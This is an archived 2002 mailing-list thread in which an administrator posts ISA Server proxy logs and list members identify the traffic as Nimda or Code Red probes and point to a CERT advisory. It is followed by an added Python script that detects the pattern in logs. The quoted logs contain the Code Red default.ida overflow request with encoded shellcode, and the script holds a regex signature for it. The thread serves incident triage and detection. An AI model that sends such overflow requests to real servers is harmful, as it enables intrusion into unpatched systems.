RE: Log

  • From: "Ewing, David F." <dewing@xxxxxxxxxxxxxxxxxxx>
  • To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
  • Date: Tue, 9 Apr 2002 15:07:52 -0400

Tough crowd.
 
 
I was under the assumption that most users subscribed here have been well
aware of the Code Red exploit. My apologies.
My intentions were to point you in the right direction.  Below is a link
that goes over the exploit, and will give you some additional information.
 
http://www.cert.org/advisories/CA-2001-19.html
 
 
Dave
 
 

-----Original Message-----
From: Joseph [mailto:cismic@xxxxxxx]
Sent: Tuesday, April 09, 2002 2:39 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


http://www.ISAserver.org


What you need to look at are the IIS logs next to determine if the vCache
304 record allowed it access to your IIS machine.
If your IIS machine has the latest service packs, then no, you should not be
affected.
 
Joseph

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx] 
Sent: Tuesday, April 09, 2002 11:38 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


Is a server of mine infected or is getting blocked?
 
Craig Hansen   

-----Original Message-----
From: Ewing, David F. [mailto:dewing@xxxxxxxxxxxxxxxxxxx] 
Sent: Tuesday, April 09, 2002 1:35 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


Nimda.
 
 
 
 

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx]
Sent: Tuesday, April 09, 2002 2:30 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Log



Does anyone know exactly what is happening here?

Thanks, 




#Fields: c-ip   cs-username     c-agent date    time    s-computername
cs-referred     r-host  r-ip    r-port  time-taken      cs-bytes
sc-bytes        cs-protocol     s-operation     cs-uri  s-object-source
sc-status      
216.93.16.114   anonymous       -       4/7/2002        10:55:17
PROXY   -        <file://www.worm.com> www.worm.com    -       -       19078
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
208.246.141.116 anonymous       -       4/7/2002        15:25:22
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18578
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
200.178.163.35  anonymous       -       4/7/2002        15:29:52
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18328
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
61.242.154.155  anonymous       -       4/7/2002        18:39:33
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18672
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      Inet    200    
200.68.3.26     anonymous       -       4/7/2002        20:21:00
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18844
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
200.67.7.199    anonymous       -       4/7/2002        23:00:29
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18406
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
61.157.84.32    anonymous       -       4/7/2002        23:28:03
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18937
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
202.105.86.209  anonymous       -       4/7/2002        23:46:54
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18375
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    


Craig Hansen 
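
The following is an added example, not part of any post in this thread: a log triage script for records like the ones quoted above. It assumes tab-separated proxy log lines preceded by a `#Fields:` header, flags requests carrying the `default.ida?` filler-plus-`%u` pattern, and splits the requesting `c-ip` addresses into internal and external, which is the distinction behind "infected or getting blocked". The internal ranges, the reduced column set and the sample records are constructed assumptions.

```python
import ipaddress
import re
from collections import Counter

# One filler character repeated after "default.ida?", then %u-encoded words,
# as in the records quoted in this thread.
SIGNATURE = re.compile(r"/default\.ida\?(\w)\1{30,}(?:%u[0-9a-fA-F]{4}){3,}")

# Assumption: internal address ranges of the site; replace with your own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

def parse(lines):
    """Yield one dict per record, named by the preceding #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].strip().split("\t")
        elif fields and line and not line.startswith("#"):
            values = [v.strip() for v in line.split("\t")]
            if len(values) == len(fields):  # skip truncated or wrapped records
                yield dict(zip(fields, values))

def triage(lines):
    """Return (internal sources, external sources, Counter of (source, status))."""
    internal, external, outcomes = set(), set(), Counter()
    for rec in parse(lines):
        if not SIGNATURE.search(rec.get("cs-uri", "")):
            continue
        ip = ipaddress.ip_address(rec["c-ip"])
        bucket = internal if any(ip in net for net in INTERNAL_NETS) else external
        bucket.add(str(ip))
        outcomes[(rec["s-object-source"], rec["sc-status"])] += 1
    return internal, external, outcomes

# Constructed sample records (documentation addresses, reduced column set).
COLS = ["c-ip", "cs-username", "date", "time", "cs-uri", "s-object-source", "sc-status"]
PROBE = "http://www.worm.com/default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u00=a"
ROWS = [
    ["203.0.113.7", "anonymous", "4/7/2002", "10:55:17", PROBE, "VCache", "304"],
    ["198.51.100.9", "anonymous", "4/7/2002", "18:39:33", PROBE, "Inet", "200"],
    ["192.168.1.20", "anonymous", "4/7/2002", "20:21:00", PROBE, "VCache", "304"],
    ["203.0.113.7", "anonymous", "4/7/2002", "23:00:29", PROBE, "VCache", "304"],
    ["192.168.1.21", "anonymous", "4/7/2002", "23:05:00", "http://www.example.com/", "Inet", "200"],
]
SAMPLE = ["#Fields: " + "\t".join(COLS)] + ["\t".join(r) for r in ROWS]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A non-empty internal set means a machine inside the assumed ranges is sending the request through the proxy and should be examined first; the per-outcome counts show which object source and status the proxy recorded for each matching request.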


